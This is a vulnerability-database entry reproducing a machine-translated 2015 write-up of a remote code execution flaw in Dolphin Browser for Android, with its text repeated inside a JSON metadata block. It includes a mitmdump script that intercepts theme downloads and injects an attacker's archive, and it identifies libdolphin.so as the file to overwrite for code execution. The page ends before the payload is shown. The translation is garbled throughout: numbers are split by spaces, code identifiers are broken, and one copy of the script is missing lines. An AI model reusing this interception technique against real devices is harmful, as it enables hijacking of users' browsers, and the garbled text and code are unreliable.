Android Dolphin Browser remote code execution-vulnerability warning-the black bar safety net
2015-08-25T00:00:00
ID MYHACK58:62201566162 Type myhack58 Reporter 佚名 Modified 2015-08-25T00:00:00
Description
The attacker has the ability to by Android the Dolphin Browser to control the user's network communication data, you can modify the download and application browser new theme function. By using this function, an attacker can write arbitrary files, these files will be in the user device browser environments into code execution. The entire attack only requires the user to do is select, Download, apply the theme.
Off 2 0 1 5 year 7 month 2 7 day, the Google App Store, the data show, the Dolphin Browser already has 1 million downloads.
Vulnerability analysis
The Android version of the Dolphin Browser have a feature that allows the user through the download, apply the theme to the browser can be personalized. When the user selects a new theme, this theme will be the way through the HTTP for download:
GET http://opsen-static.dolphin-browser.com/resources/themestore/Red_roof.dwp
The theme file will be saved to the following location:
root@hammerhead:/sdcard/Download # ls
Red_roof. dwp
The file extension“dwp”is only for the Dolphin Browser your own custom extension, and in fact this file is a simple zip file.
$ file Red_roof. dwp
Red_roof. dwp: Zip archive data, at least v2. 0 to extract
When we detect where the content can be found which is used to apply the target theme of the special data:
unzip-l Red_roof. dwp. orig
Archive: Red_roof. dwp. orig
Length Date Time Name
-------- ---- ---- ----
1 8 1 6 5 12-18-14 0 9:5 7 icon.jpg
2 3 7 12-19-14 1 4:3 5 theme. config
1 3 1 3 8 4 12-18-14 0 9:5 4 wallpaper.jpg
-------- -------
1 4 9 7 8 6 3 files
Later on we select, Download, apply the theme for the reverse engineering process. Found this feature can also unzip the theme file and apply theme to the other configuration.
Exploit
In use, the first step that you want to proxy to download data communication and injection to modify the theme, which we need in the test apparatus to configure a proxy, then write a simple inline script to use mitmdump
def request(context, flow):
if not flow. request. host == "opsen-static.dolphin-browser.com" \
or not flow. request. path. endswith(". dwp"):
return
try:
with open("Red_roof. dwp", "r") as f:
modified = f. read()
response. content = modified
response. headers["Content-Length"] = [len(modified)]
f. close()
except IOError as e:
raise e
Return response
flow. reply(response)
We also need to use the browser theme of the decompression process. Due to such cases a lot, here we do not continue to elaborate.
The first verify will modify the theme injected to the download response, and the successful implementation of the Dolphin Browser the data directory is written to an arbitrary file. In order to gain code execution privileges, then we need to find a can be covered by the file.
Inadvertently scan a scan, found one in the file directory into the library-libdolphin. so
root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser # cd files/
root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser/files # ls
AppEventsLogger. persistedevents
EN
icons_cache
libdolphin. so
name_service
splash. on
It would seem that God give us bread?, we can write the complete code implementation. Thus I produced a corresponding payload:
unzip-l Red_roof. dwp
Archive: Red_roof. dwp
Length Date Time Name
-------- ---- ---- ----
{"id": "MYHACK58:62201566162", "type": "myhack58", "href": "http://www.myhack58.com/Article/html/3/62/2015/66162.htm", "viewCount": 3, "published": "2015-08-25T00:00:00", "references": [], "edition": 1, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-08T20:50:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-08T20:50:16", "rev": 2}, "vulnersScore": 0.5}, "cvelist": [], "modified": "2015-08-25T00:00:00", "title": "Android Dolphin Browser remote code execution-vulnerability warning-the black bar safety net", "description": "The attacker has the ability to by Android the Dolphin Browser to control the user's network communication data, you can modify the download and application browser new theme function. By using this function, an attacker can write arbitrary files, these files will be in the user device browser environments into code execution. The entire attack only requires the user to do is select, Download, apply the theme. \nOff 2 0 1 5 year 7 month 2 7 day, the Google App Store, the data show, the Dolphin Browser already has 1 million downloads. \nVulnerability analysis \nThe Android version of the Dolphin Browser have a feature that allows the user through the download, apply the theme to the browser can be personalized. When the user selects a new theme, this theme will be the way through the HTTP for download: \nGET http://opsen-static.dolphin-browser.com/resources/themestore/Red_roof.dwp \nThe theme file will be saved to the following location: \nroot@hammerhead:/sdcard/Download # ls \nRed_roof. dwp \nThe file extension\u201cdwp\u201dis only for the Dolphin Browser your own custom extension, and in fact this file is a simple zip file. \n$ file Red_roof. dwp \nRed_roof. dwp: Zip archive data, at least v2. 0 to extract \nWhen we detect where the content can be found which is used to apply the target theme of the special data: \nunzip-l Red_roof. dwp. orig \nArchive: Red_roof. dwp. orig \nLength Date Time Name \n\\-------- ---- ---- ---- \n1 8 1 6 5 12-18-14 0 9:5 7 icon.jpg \n2 3 7 12-19-14 1 4:3 5 theme. config \n1 3 1 3 8 4 12-18-14 0 9:5 4 wallpaper.jpg \n\\-------- ------- \n1 4 9 7 8 6 3 files \nLater on we select, Download, apply the theme for the reverse engineering process. Found this feature can also unzip the theme file and apply theme to the other configuration. \nExploit \nIn use, the first step that you want to proxy to download data communication and injection to modify the theme, which we need in the test apparatus to configure a proxy, then write a simple inline script to use mitmdump \ndef request(context, flow): \nif not flow. request. host == \"opsen-static.dolphin-browser.com\" \\ \nor not flow. request. path. endswith(\". dwp\"): \nreturn \n# Build response \n# \nresponse = http. HTTPResponse([1, 1], \n2 0 0, \n\"OK\", \nodict. ODictCaseless([[\"Content-Type\", \"application/zip\"]]), \n\"yo!\") \n# Inject theme \n# \ntry: \nwith open(\"Red_roof. dwp\", \"r\") as f: \nmodified = f. read() \nresponse. content = modified \nresponse. headers[\"Content-Length\"] = [len(modified)] \nf. close() \nexcept IOError as e: \nraise e \n# Return response \n# \nflow. reply(response) \nWe also need to use the browser theme of the decompression process. Due to such cases a lot, here we do not continue to elaborate. \nThe first verify will modify the theme injected to the download response, and the successful implementation of the Dolphin Browser the data directory is written to an arbitrary file. In order to gain code execution privileges, then we need to find a can be covered by the file. \nInadvertently scan a scan, found one in the file directory into the library-libdolphin. so \nroot@hammerhead:/data/data/mobi.mgeek.TunnyBrowser # cd files/ \nroot@hammerhead:/data/data/mobi.mgeek.TunnyBrowser/files # ls \nAppEventsLogger. persistedevents \nEN \nicons_cache \nlibdolphin. so \nname_service \nsplash. on \nIt would seem that God give us bread?, we can write the complete code implementation. Thus I produced a corresponding payload: \nunzip-l Red_roof. dwp \nArchive: Red_roof. dwp \nLength Date Time Name \n\\-------- ---- ---- ---- \n\n\n**[1] [[2]](<66162_2.htm>) [next](<66162_2.htm>)**\n", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-11-08T20:50:16"}
